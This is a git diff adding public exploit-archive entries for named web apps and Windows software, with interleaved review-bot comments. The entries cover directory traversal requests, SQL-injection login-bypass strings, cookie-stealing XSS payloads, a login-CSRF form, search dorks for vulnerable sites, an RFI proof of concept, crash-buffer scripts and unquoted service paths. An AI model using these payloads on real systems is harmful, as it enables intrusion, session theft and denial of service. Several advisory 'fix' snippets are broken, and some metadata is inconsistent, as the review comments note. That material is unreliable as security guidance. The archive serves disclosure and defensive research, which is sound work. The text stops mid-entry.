diff --git a/exploits/hardware/webapps/48614.txt b/exploits/hardware/webapps/48614.txt
new file mode 100644
index 000000000..717c037e3
--- /dev/null
+++ b/exploits/hardware/webapps/48614.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal
+# Date: 2018-09-29
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://powerquality.eaton.com/
+# Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999
+# Version: v1.6
+# Tested on: Windows
+
+# CVE-2018-12031
+# https://nvd.nist.gov/vuln/detail/CVE-2018-12031
+# https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
+
+# PoC
+To exploit vulnerability, someone could use
+'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../'
+request to get some informations from the target.
+
+GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host
+HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0)
+Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
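Review bot: The entry stops at the request and gives defenders nothing to act on, since no mitigation, fixed-version or detection line follows the CVE reference. Two header comments would cover it, for example `# Detection: requests to /server/node_upgrade_srv.js with action=downloadFirmware whose firmware value contains ../ sequences` and `# Mitigation: apply the vendor update referenced from the NVD entry for CVE-2018-12031`. The `# Version: v1.6` line should also say whether later releases are affected, if that is known.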
diff --git a/exploits/multiple/webapps/49165.txt b/exploits/multiple/webapps/49165.txt
new file mode 100644
index 000000000..95aaa00d5
--- /dev/null
+++ b/exploits/multiple/webapps/49165.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection
+# Date: 2020–11–17
+# Exploit Author: Anurag Kumar Rawat(A1C3VENOM)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
+# Version: 1.1
+# Tested on Parrot os(Linux)
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection quiries.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/erms/admin/index.php
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: ' or '1'='1
+
+3)Server accept this payload and attacker successfully bypassed admin panel
+without any credentials
\ No newline at end of file
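Review bot: The `# Date:` header uses en dashes (`2020–11–17`) instead of ASCII hyphens, so it will not parse or sort with the ISO dates used by the other entries in this commit; it should read `# Date: 2020-11-17`. The write-up also ends at the bypass and never names the root cause or a fix. A closing line such as `Mitigation: build the admin login query with prepared statements (PDO or mysqli bound parameters) and verify the password against a stored hash in PHP rather than inside the WHERE clause` would make it useful to maintainers. The same missing-remediation gap applies to exploits/php/webapps/49212.txt.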
diff --git a/exploits/php/webapps/39033.py b/exploits/php/webapps/39033.py
index 83c91739a..1095f0049 100755
--- a/exploits/php/webapps/39033.py
+++ b/exploits/php/webapps/39033.py
@@ -1,17 +1,17 @@
 #!/usr/bin/env python
 
-# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
+# Exploit Title: Joomla 1.5 - 3.4.6 Object Injection RCE X-Forwarded-For header
 # Date: 12/17/2015
 # Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
 # Vendor Homepage: https://www.joomla.org/
 # Software Link: http://joomlacode.org/gf/project/joomla/frs/
-# Version: Joomla 1.5 - 3.4.5
+# Version: Joomla 1.5 - 3.4.6
 # Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
 # CVE : CVE-2015-8562
 
 
 '''
-    Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
+    Joomla 1.5 - 3.4.6 Object Injection RCE - CVE-2015-8562
     PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
 
     Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): 
diff --git a/exploits/php/webapps/48700.txt b/exploits/php/webapps/48700.txt
new file mode 100644
index 000000000..5c18b5607
--- /dev/null
+++ b/exploits/php/webapps/48700.txt
@@ -0,0 +1,54 @@
+# Exploit Title: PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting
+# Date: 2020-08-20
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://pandorafms.org/
+# Software Link: https://pandorafms.org/features/free-download-monitoring-software/
+# Version: 7.0NG747
+# Tested on: Windows/Linux/ISO
+
+# Link https://github.com/EmreOvunc/Pandora-FMS-7.0-NG-747-Stored-XSS
+
+# Description
+A stored cross-site scripting (XSS) in Pandora FMS 7.0 NG 747 can result in
+an attacker performing malicious actions to users who open a maliciously
+crafted link or third-party web page. (Workspace >> Issues >> List of
+issues >> Add - Attachment)
+
+# PoC
+
+To exploit vulnerability, someone could use a POST request to
+'/pandora_console/index.php' by manipulating 'filename' parameter in the
+request body to impact users who open a maliciously crafted link or
+third-party web page.
+
+POST /pandora_console/index.php?sec=workspace&sec2=operation/incidents/incident_detail&id=3&upload_file=1
+HTTP/1.1
+Host: [HOST]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0)
+Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------188134206132629608391758747427
+Content-Length: 524
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=3098fl65su4l237navvq6d5igs
+Upgrade-Insecure-Requests: 1
+
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="userfile"; filename="\"><svg
+onload=alert(document.cookie)>.png"
+Content-Type: image/png
+
+"><svg onload=alert(1)>
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="file_description"
+
+desc
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="upload"
+
+Upload
+-----------------------------188134206132629608391758747427--
\ No newline at end of file
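Review bot: The `Cookie: PHPSESSID=3098fl65su4l237navvq6d5igs` header looks like a session identifier captured from a real test session and should be replaced with a placeholder in the style of `Host: [HOST]`, e.g. `Cookie: PHPSESSID=[SESSION]`. The Description and PoC prose say the impact falls on users who "open a maliciously crafted link or third-party web page", which describes a reflected flow, while the title and the upload request describe a stored one. If the payload is stored in the attachment file name and rendered to users who view the issue, the text should say so. No fixed version or remediation, such as output-encoding the stored file name, is recorded.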
diff --git a/exploits/php/webapps/49064.txt b/exploits/php/webapps/49064.txt
new file mode 100644
index 000000000..4b948e8f8
--- /dev/null
+++ b/exploits/php/webapps/49064.txt
@@ -0,0 +1,316 @@
+# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
+# Exploit Author: Vulnerability-Lab
+# Date: 2020-11-11
+# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended
+# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
+# Version: 3.5.3
+
+Document Title:
+===============
+SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2265
+
+
+Release Date:
+=============
+2020-11-11
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2265
+
+
+Common Vulnerability Scoring System:
+====================================
+7.8
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+2.000€ - 3.000€
+
+
+Product & Service Introduction:
+===============================
+It offers numerous opportunities to present pictures quickly and easily
+in articles. The unique feature of the plugin is
+that you can control any parameter on the syntax call. Editor Button -
+SIGE Parameters: With the button, you can set the
+parameters very easy on-the-fly in an article. It is an excellent
+addition to SIGE. Highlights are: parameter call, watermark
+function, read IPTC data, thumbnail storage, crop function, sort by
+modification date, output as a list, CSS Image Tooltip,
+Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was
+rewritten entirely and equipped with numerous innovations.
+The absolute highlight is the turbo mode. This feature doesn't exist in
+any other plugin for Joomla!. In Turbo Mode 2 text files
+are created from the HTML output of the gallery and loaded in successive
+runs. This feature eliminates the tedious editing
+process of each image. In a test with 50 large images, the creation of a
+gallery with all the extra features (save thumbnails,
+watermark generation, resize original images, etc.) without turbo mode
+lasted approximately 17 seconds. In turbo mode, it only
+took 1 second, and the gallery on the same scale was available! For
+calling the syntaxes, additionally, an Editor Button has
+been programmed. It makes it very easy to choose the required syntax,
+showing all the settings and parameters of the plugin.
+It is a great enrichment in using the SIGE plugin.
+
+(Copy of the Homepage:
+https://kubik-rubik.de/sige-simple-image-gallery-extended )
+(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ;
+https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ;
+https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ )
+
+
+Abstract Advisory Information:
+==============================
+An independent vulnerability laboratory researcher discovered multiple
+web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 &
+v3.5.3 pro extension for joomla.
+
+
+Affected Product(s):
+====================
+Vendor:
+Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro -
+Joomla Extension (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-11-10: Researcher Notification & Coordination (Security Researcher)
+2020-11-11: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Open Authentication (Anonymous Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+1.1
+A file include vulnerability has been discovered in the official Simple
+Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla.
+The web vulnerability allows remote attackers to unauthorized upload
+web-shells or malicious contents to compromise the local file-system.
+
+The vulnerability is located in the img parameter of the print.php file.
+Remote attackers are able to upload images to the unrestricted assets
+path to compromise the web-applications file-system and involved
+database management system. Exploitation requires no user interaction
+and only
+a low privileged user account to upload images.
+
+
+1.2
+Multiple non-persistent cross site web vulnerabilities has been
+discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 &
+v3.5.3 pro extension for joomla.
+The vulnerability allows remote attackers to inject own malicious script
+codes with non-persistent attack vector to compromise browser to
+web-application requests from the client-side.
+
+The non-persistent cross site scripting web vulnerabilities are located
+in the `name` and `title` parameters of the `print.php` file.
+Remote attackers without user or guest privileges are able to make own
+malicious special crafted links to compromise client-side
+GET method requests. The attack vector is non-persistent and the issue
+affects the client-side.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, non-persistent phishing attacks, non-persistent
+external redirects to malicious source and non-persistent client-side
+manipulation of affected application modules.
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The remote file include web vulnerability can be exploited by remote
+attackers without privileged user account or user interaction.
+For security demonstration or to reproduce the persistent cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+Dork(s):
+intext:"Powered by Simple Image Gallery Extended"
+intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
+
+
+PoC: Exploitation
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI
+VULNERABILITY!]&name=[NAME]%20title=[TITLE]
+
+
+1.2
+The non-persistent cross site scripting web vulnerability can be
+exploited by remote attackers without privileged user account and with
+low user interaction.
+For security demonstration or to reproduce the persistent cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+Dork(s):
+intext:"Powered by Simple Image Gallery Extended"
+intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
+
+
+PoC: Payload
+"><svg onload=alert()>
+'><script>alert('');</script>
+<IMG "'"><script>alert()</script>'>
+
+PoC: Example
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE]
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT
+XSS]
+
+
+PoC: Exploitation
+http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php
+?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The remote file include vulnerability issue can be resolved by the
+following steps ...
+
+Example :
+?php
+$files=array('test.gif');
+if(in_array($_GET['file'], $files)){
+include ($_GET['file']);
+}
+?
+* If you are a server administrator, turn off allow_url_fopen from the file
+
+* Or do it with the ini_set command. Only for (RFI)
+?php
+ini_set('allow_url_fopen ', 'Off');
+?
+
+* We can use the strpos command to check that if the address is: //
+http, the file will not be enclosed
+?php
+$strpos = strpos($_GET['url'],'http://');
+if(!$strpos){
+include($_GET['url']);
+}
+?
+
+* Using str_replace we can give the given address from two characters
+"/", "." Let's clean up
+?php
+$url=$_GET['url'];
+$url = str_replace("/", "", $url);
+$url = str_replace(".", "", $url);
+include($url);
+?
+
+
+1.2
+The client-side cross site scripting vulnerabilities can be resolved by
+the following steps ...
+1. Encode and escape as parse the name and title parameters
+2. Filter the input for special chars and disallow them in parameters
+
+
+Security Risk:
+==============
+1.1
+The securit risk of the remote file include vulnerability in the img
+path of the web-application request is estimated as high.
+
+1.2
+The security risk of the non-persistent cross site scripting
+vulnerabilities is estimated as medium.
+
+
+Credits & Authors:
+==================
+h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec
+Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
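Review bot: Several snippets in the "Solution - Fix & Patch" section would not protect a site that copied them. `if(!$strpos)` treats a match at offset 0 the same as no match, so a value beginning with `http://` still reaches `include`; the test needs `strpos($_GET['url'], 'http://') === false`, and even then it covers only one scheme. `ini_set('allow_url_fopen ', 'Off')` has a trailing space in the directive name, and as far as I know that directive cannot be changed at runtime; `allow_url_include` in php.ini is the setting that governs `include` of URLs. The `str_replace` variant strips every `.` and `/`, which also breaks legitimate names such as the `test.gif` used in the first example. The allowlist example is the only sound one and should be presented as the recommended fix, with a strict comparison: `in_array($_GET['file'], $files, true)`.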
diff --git a/exploits/php/webapps/49180.txt b/exploits/php/webapps/49180.txt
new file mode 100644
index 000000000..5220768ca
--- /dev/null
+++ b/exploits/php/webapps/49180.txt
@@ -0,0 +1,32 @@
+# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery
+# Exploit Author: Dipak Panchal(th3.d1p4k)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel
+# Version: 5
+# Tested on Windows 10
+
+Attack Vector:
+An attacker can craft HTML page containing POST information to have the
+victim sign into an attacker's account, where the victim can add
+information assuming he/she is logged into the correct account, where in
+reality, the victim is signed into the attacker's account where the changes
+are visible to the attacker.
+
+Exploit:
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/loginsystem/" method="POST">
+      <input type="hidden" name="uemail" value="user1@mail.com" />
+      <input type="hidden" name="password" value="User@1234" />
+      <input type="hidden" name="login" value="LOG&#32;IN" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+Mitigation:
+Please add a csrf token to login request or make some type prompt that the
+session has ended when the new login from attacker occurs.
\ No newline at end of file
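Review bot: The header block contradicts itself, so the affected build cannot be identified from this entry: the title says version 2.1 while `# Version: 5` says otherwise, and `# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel` has no host. There is also no `# Date:` line, which the other new entries carry. The Mitigation paragraph is a useful addition; it would be more precise as `Mitigation: require an anti-CSRF token on the login form, bound to a pre-login session, and regenerate the session ID after authentication`.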
diff --git a/exploits/php/webapps/49204.txt b/exploits/php/webapps/49204.txt
new file mode 100644
index 000000000..22d469727
--- /dev/null
+++ b/exploits/php/webapps/49204.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting
+# Date: 04-12-2020
+# Exploit Author: Pruthvi Nekkanti
+# Vendor Homepage: https://phpgurukul.com
+# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
+# Version: 1.0
+# Tested on: Kali Linux
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Admin Username.
+
+Steps-To-Reproduce:
+1. Go to the Product admin panel change the admin username
+2. Put this payload in admin username field:"><script>alert(document.cookie)</script>
+3. Now go to the website and the XSS will be triggered.
\ No newline at end of file
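Review bot: The entry ends at step 3 with no remediation, and it does not state that changing the admin username already requires an authenticated administrator, which matters for severity. I would add `# Privileges required: admin` to the header (if that matches what was tested) and a closing line such as `Mitigation: HTML-encode the stored username on output (htmlspecialchars with ENT_QUOTES) and set HttpOnly on the session cookie`. The `# Date: 04-12-2020` format is ambiguous next to the ISO dates used elsewhere in the commit. The missing remediation also applies to exploits/php/webapps/49208.txt, 49209.txt and 49215.txt.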
diff --git a/exploits/php/webapps/49208.txt b/exploits/php/webapps/49208.txt
new file mode 100644
index 000000000..0a668289d
--- /dev/null
+++ b/exploits/php/webapps/49208.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Savsoft Quiz 5 - 'Skype ID' Stored XSS
+# Exploit Author: Dipak Panchal(th3.d1p4k)
+# Vendor Homepage: https://savsoftquiz.com
+# Software Link: https://github.com/savsofts/savsoftquiz_v5
+# Version: 5
+# Tested on Windows 10
+
+Attack Vector:
+This vulnerability can results attacker to inject the XSS payload in User
+Registration section and each time admin visits the manage user section
+from admin panel, and home page too. XSS triggers and attacker can able to
+steal the cookie according to the crafted payload.
+
+Steps to reproduce:
+1. Create new account and verified it.
+
+2. Navigate to Edit Profile:
+-> http://localhost/savsoftquiz/index.php/user/edit_user/123
+
+3. Put the below Payload in Skype ID field. and submit it.
+Payload: abcd<script>alert("XSS")</script>
+
+4. You will get XSS popup.
\ No newline at end of file
diff --git a/exploits/php/webapps/49209.txt b/exploits/php/webapps/49209.txt
new file mode 100644
index 000000000..06ea8299c
--- /dev/null
+++ b/exploits/php/webapps/49209.txt
@@ -0,0 +1,28 @@
+# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting
+# Date: 05.09.2020
+# Author: Vincent666 ibn Winnie
+# Software Link: https://www.vbulletin.com/en/features/
+# Tested on: Windows 10
+# Web Browser: Mozilla Firefox & Opera
+# Google Dorks: "Powered by vBulletin® Version 5.6.3"
+
+Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
+Choose "Denim" or other theme and choose action "Add new template" and
+click "Go".
+
+Put on the title "1" and template "1" and "Save and Reload". Now you
+can catch the new URL with HTTP Live Headers or with hands.
+
+So..we have Url :
+
+https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0
+
+Test it with hands and get cross site scripting. Use for tests
+different browsers. I use Mozilla Firefox and Opera.
+
+https://localhost/admincp/template.php?templateid=1&group=""><script>alert("Cross
+Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=
+
+Picture:
+
+https://imgur.com/a/b6gH5Fn
\ No newline at end of file
diff --git a/exploits/php/webapps/49212.txt b/exploits/php/webapps/49212.txt
new file mode 100644
index 000000000..1892fc234
--- /dev/null
+++ b/exploits/php/webapps/49212.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Online Bus Ticket Reservation 1.0 - SQL Injection
+# Date: 2020-12-07
+# Exploit Author: Sakshi Sharma
+# Vendor Homepage: https://www.sourcecodester.com/php/5012/online-bus-ticket-reservation-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/busreservation.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: admin page
+
+#Exploit
+	Open the Application
+	check the URL:
+	http://localhost/busreservation/index.php
+	Open Admin Login
+	Enter username: 'or"='
+	Enter password: 'or"='
+	click on login
+The SQL payload gets executed and authorization is bypassed successfully
\ No newline at end of file
diff --git a/exploits/php/webapps/49215.txt b/exploits/php/webapps/49215.txt
new file mode 100644
index 000000000..dba26e9e4
--- /dev/null
+++ b/exploits/php/webapps/49215.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Employee Performance Evaluation System 1.0 - ' Task and Description' Persistent Cross Site Scripting
+# Date: 08/12/2020
+# Exploit Author: Ritesh Gohil
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+Steps to Reproduce:
+1) Login with Admin Credentials and click on 'Task' button.
+2) Click on Add New Task Button.
+3) Now add the following payload input field of Task and Description
+
+Payload:  ritesh"><img src=x onerror=alert(document.domain)>
+
+4) Click On Save
+5) XSS payload is triggered.
\ No newline at end of file
diff --git a/exploits/windows/dos/49206.txt b/exploits/windows/dos/49206.txt
new file mode 100644
index 000000000..178a59860
--- /dev/null
+++ b/exploits/windows/dos/49206.txt
@@ -0,0 +1,30 @@
+# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC)
+# Date: 2020-05-12
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+# Version: 2.13.7 x64
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program TapinRadio 
+# In Settings select Preferences option
+# Click in Miscellaneous and click in Set Application Proxy
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Mikon.txt"
+# Paste the content in the field Username and Address and click in OK
+# Click in Ok again
+# After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again
+# End :)
+
+
+buffer = 'K' * 20000
+
+try: 
+    file = open("Mikon.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
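Review bot: The embedded script uses a bare `except:` that hides the actual failure, reuses the Python 2 built-in name `file`, and leaves the handle open if `write` raises. `with open("Mikon.txt", "w") as fh: fh.write(buffer)` inside the `try`, with `except OSError as err:` printing `err`, would be the idiomatic form. The file is stored as `.txt` although it carries a Python script, and `# Date: 2020-05-12` may have day and month transposed given the 2020-12 dates on neighbouring entries, which is worth confirming. The same code pattern appears in exploits/windows/dos/49207.txt.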
diff --git a/exploits/windows/dos/49207.txt b/exploits/windows/dos/49207.txt
new file mode 100644
index 000000000..927ff39a9
--- /dev/null
+++ b/exploits/windows/dos/49207.txt
@@ -0,0 +1,29 @@
+# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC)
+# Date: 2020-05-12
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: https://www.raimersoft.com/rarmaradio.html
+# Version: 2.75.5
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+#STEPS
+# Open the program TapinRadio 
+# In Edit select Settings option
+# Click in Network
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Paimon.txt"
+# Paste the content in the field Username, Address and Server and click in OK
+# End :)
+
+
+buffer = 'K' * 20000
+
+try: 
+    file = open("Paimon.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
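Review bot: The metadata does not agree with itself: the title says RarmaRadio 2.72.5 while the header has `# Version: 2.75.5`, and the first step reads `# Open the program TapinRadio`, which looks copied from 49206.txt. These should be reconciled so the affected product and build are unambiguous, e.g. `# Open the program RarmaRadio` if the title is correct. The entry also records `# CVE : n/a` but no vendor notification or fix status.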
diff --git a/exploits/windows/local/49015.txt b/exploits/windows/local/49015.txt
new file mode 100644
index 000000000..32951e2e5
--- /dev/null
+++ b/exploits/windows/local/49015.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path
+# Discovery by: Erika Figueroa
+# Discovery Date: 2020-11-07
+# Vendor Homepage: https://www.realtek.com/en/
+# Tested Version: 1.0.0.55
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
+
+Realtek Audio Service                                                   RtkAudioService                     C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe            Auto
+# Service info:
+
+C:\>sc qc "RtkAudioService"
+[[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: RtkAudioService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
+        GRUPO_ORDEN_CARGA  : PlugPlay
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Realtek Audio Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
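Review bot: The discovery command filters on `findstr /i "CodeMeter"`, which cannot produce the `RtkAudioService` row shown beneath it; the filter looks copied from another advisory and should name this service (the same filter appears in 49158.txt). The `sc qc` output also begins with a doubled bracket, `[[SC]`. The "#Exploit:" paragraph does not record whether a non-admin user can write to the relevant parent directories, which decides whether this is exploitable on a default install; an `icacls` listing of those directories would settle it. None of the four unquoted-path entries (this one, 49158.txt, 49203.txt, 49205.txt) gives the fix, which is to quote the binary path in the service configuration, e.g. `sc config RtkAudioService binPath= "\"C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe\""`.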
diff --git a/exploits/windows/local/49158.txt b/exploits/windows/local/49158.txt
new file mode 100644
index 000000000..8d2780566
--- /dev/null
+++ b/exploits/windows/local/49158.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path
+# Discovery by: manuel Alvarez
+# Discovery Date: 2020-11-07
+# Vendor Homepage:  https://www.realtek.com/en/
+# Tested Version: 1.0.64.7
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i
+"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i
+/v """
+
+Andrea RT Filters Service
+AERTFilters                         C:\Program Files\IDT\WDM\AESTSr64.exe
+             Auto
+
+# Service info:
+
+C:\Users\ComoDVD>sc qc AESTFilters
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: AESTFilters
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
+        GRUPO_ORDEN_CARGA  :
